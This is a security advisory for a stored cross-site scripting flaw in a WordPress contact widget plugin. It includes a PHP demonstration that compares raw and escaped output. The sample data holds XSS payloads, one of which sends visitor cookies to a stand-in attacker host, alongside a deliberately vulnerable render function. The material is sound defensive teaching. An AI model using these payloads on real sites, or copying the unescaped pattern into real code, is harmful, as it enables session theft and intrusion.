Impact
The Business Contact Widget plugin stores user-supplied widget content without filtering it and later echoes that content into the page unescaped. Because the output is not encoded for its HTML context, JavaScript injected into the stored content runs in the browser of every visitor who loads a page containing the widget. The flaw is a stored cross-site scripting issue (CWE-79): an attacker can execute arbitrary script in the visitor's session, steal cookies or other session data, deface content, or redirect users. The description does not state the privilege required; the likely precondition is an account allowed to create or edit the widget, since that is what places the payload in storage.
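The following is an added example, not code from the Business Contact Widget plugin or from StressFree Sites. It models the pattern the advisory describes in plain PHP: stored widget settings are echoed into markup, first unescaped (the vulnerable shape) and then escaped per output context with the WordPress helpers esc_html(), esc_attr() and esc_url(). The function names bcw_render_vulnerable/bcw_render_safe, the field set, and the sample settings are assumptions; the fallback definitions at the top only exist so the file runs under the php CLI without WordPress loaded, and inside WordPress the real helpers take precedence.

```php
<?php
// Added example (not the plugin's own code). Demonstrates why echoing stored
// widget settings raw is a stored XSS, and what context-aware escaping does.

// Stand-alone fallbacks so this runs under plain `php` without WordPress.
// In a real plugin these are provided by WordPress core; do not ship these.
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_url')) {
    // Minimal stand-in for WordPress esc_url(): reject URLs whose scheme is
    // not in a short allow-list (so "javascript:" yields ""), then encode.
    function esc_url(string $s): string {
        $s = trim($s);
        if (!preg_match('#^(https?://|mailto:|tel:)#i', $s)) {
            return '';
        }
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Constructed sample of what an account with widget-edit access might save.
// Each value targets a different output context: text node, attribute, URL.
$settings = [
    'title'   => '<script>location="https://attacker.example/?c="+document.cookie</script>',
    'phone'   => '"><img src=x onerror=alert(1)>',
    'website' => 'javascript:alert(document.domain)',
];

// Vulnerable shape: stored input concatenated straight into the markup that
// the widget's front-end render path sends to every visitor.
function bcw_render_vulnerable(array $s): string {
    return '<div class="bcw">'
        . '<h3>' . $s['title'] . '</h3>'
        . '<a href="tel:' . $s['phone'] . '">' . $s['phone'] . '</a>'
        . '<a href="' . $s['website'] . '">Website</a>'
        . '</div>';
}

// Hardened shape: escape at output time, choosing the escaper by where the
// value lands. Sanitising on save is worthwhile defence in depth, but output
// escaping is what actually closes the hole.
function bcw_render_safe(array $s): string {
    return '<div class="bcw">'
        . '<h3>' . esc_html($s['title']) . '</h3>'
        . '<a href="' . esc_attr('tel:' . $s['phone']) . '">' . esc_html($s['phone']) . '</a>'
        . '<a href="' . esc_url($s['website']) . '">Website</a>'
        . '</div>';
}

echo "VULNERABLE:\n" . bcw_render_vulnerable($settings) . "\n\n";
echo "SAFE:\n" . bcw_render_safe($settings) . "\n";
```

Running the file prints the vulnerable output with a live script tag, an attribute breakout and a javascript: link, followed by the safe output where the first two are rendered as inert text and the third link has an empty href. When auditing a WordPress widget, look for the same three contexts in its widget() method: any setting echoed without esc_html()/esc_attr()/esc_url() (or wp_kses_post() where limited HTML is intended) is the pattern this advisory describes.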
Affected Systems
All releases of StressFree Sites' Business Contact Widget plugin up to and including version 2.7.0 are affected. The flaw has been present since the plugin's initial release, so any WordPress site running 2.7.0 or earlier should be treated as vulnerable until the plugin is updated or removed. Because it ships as a WordPress widget plugin, it may be installed on a wide range of sites.
Risk and Exploitability
The CVSS base score of 5.9 rates the issue as medium severity, and the EPSS score below 1% indicates a low probability of exploitation in the wild at present. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The exact access requirement is not specified; the reasonable inference is that the attacker needs the ability to create or edit the widget in order to store the payload. Once stored, the script executes for every visitor to any page that renders the widget, so a single malicious edit can reach a broad audience.